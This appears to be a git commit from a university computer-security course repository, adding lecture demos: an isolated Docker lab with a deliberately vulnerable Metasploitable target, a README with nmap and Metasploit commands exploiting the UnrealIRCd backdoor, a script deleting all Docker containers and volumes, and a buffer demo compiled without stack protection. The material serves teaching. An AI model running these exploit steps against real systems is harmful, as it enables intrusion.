end of semester

ThierrySans · May 22, 2018 · a329c7f · a329c7f
1 parent eb19e9b
commit a329c7f
Show file tree

Hide file tree

Showing 16 changed files with 98 additions and 129 deletions.
diff --git a/lectures/03/CSCD27-SymmetricProtocols.pdf b/lectures/03/CSCD27-SymmetricProtocols.pdf
diff --git a/lectures/05/demo/docker-compose.yml b/lectures/05/demo/docker-compose.yml
@@ -15,7 +15,7 @@ services:
       image: attacker
       container_name: mallory
       restart: always
-      network_mode: service:alice # Examine traffic of service bob
+      network_mode: service:alice
       tty: true
 
 networks:

diff --git a/lectures/08/demo/README.md b/lectures/08/demo/README.md
@@ -0,0 +1,14 @@
+### metasploitable and open-vas
+
+docker-compose up
+
+### nmap 
+
+nmap -p0-65535 -sV -O 10.0.0.2
+
+### metasploit 
+
+msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
+msf > show options
+msf > set RHOST 10.0.0.2
+msf > exploit
diff --git a/lectures/08/demo/clean.sh b/lectures/08/demo/clean.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+docker stop $(docker ps -a -q)
+docker rm -f $(docker ps -a -q)
+docker network rm $(docker network ls -q)
+docker volume rm $(docker volume ls -f dangling=true -q)
+docker rmi $(docker images -f dangling=true -q)
diff --git a/lectures/08/demo/docker-compose.yml b/lectures/08/demo/docker-compose.yml
@@ -0,0 +1,36 @@
+version: '3'
+
+services:
+  metasploitable:
+    build: ./metasploitable
+    image: metasploitable
+    container_name: metasploitable
+    tty: true
+    networks:
+      channel:
+        ipv4_address: 10.0.0.2
+
+  metasploit:
+    build: ./metasploit
+    image: metasploit
+    container_name: metasploit
+    tty: true
+    networks:
+      channel:
+        ipv4_address: 10.0.0.3
+
+  openvas:
+      image: mikesplain/openvas
+      container_name: openvas
+      ports:
+        - "443:443"
+      networks:
+        channel:
+          ipv4_address: 10.0.0.4
+
+networks:
+  channel:
+    driver: bridge
+    ipam:
+      config:
+        - subnet: 10.0.0.0/24
diff --git a/lectures/08/demo/metasploit/Dockerfile b/lectures/08/demo/metasploit/Dockerfile
@@ -0,0 +1,4 @@
+FROM strm/metasploit:latest
+
+CMD /bin/bash
+
diff --git a/lectures/08/demo/metasploitable/Dockerfile b/lectures/08/demo/metasploitable/Dockerfile
@@ -0,0 +1,6 @@
+FROM meknisa/metasploitable-base:latest
+
+COPY ./init.sh /root/init.sh
+
+CMD /root/init.sh
+
diff --git a/lectures/08/demo/metasploitable/init.sh b/lectures/08/demo/metasploitable/init.sh
@@ -0,0 +1,5 @@
+#!/usr/bin/env bash
+
+/usr/bin/unrealircd
+
+/bin/bash
diff --git a/lectures/09/CSCD27 Protection.key b/lectures/09/CSCD27 Protection.key
diff --git a/lectures/09/CSCD27-Defences.key b/lectures/09/CSCD27-Defences.key
diff --git a/lectures/09/demo/Dockerfile b/lectures/09/demo/Dockerfile
@@ -0,0 +1,3 @@
+FROM ubuntu
+
+RUN apt-get update && apt-get install gdb gcc-multilib libssl-dev python -y
diff --git a/lectures/09/demo/run.sh b/lectures/09/demo/run.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+gcc /shared/test.c -o /shared/test -fno-stack-protector -m32
+objdump -d -M intel /shared/test > /shared/test.x86 
diff --git a/lectures/09/demo/test.c b/lectures/09/demo/test.c
@@ -0,0 +1,19 @@
+#include <stdio.h>
+#include <string.h>
+
+int foo2(int *i, char *s){
+    //printf("%d", *i);
+    char buffer[10];
+    //strcpy(buffer, s);
+    //printf("%s", buffer);
+}
+
+int foo(){
+    int i = 8;
+    char *s = "hello";
+    foo2(&i, s);
+}
+
+int main(int argc, char **argv){
+    foo();
+}
diff --git a/lectures/10/CSCD27-MaliciousSoftware.key b/lectures/10/CSCD27-MaliciousSoftware.key
diff --git a/tutorials/10/README.old b/tutorials/10/README.old
diff --git a/tutorials/10/vuln.c b/tutorials/10/vuln.c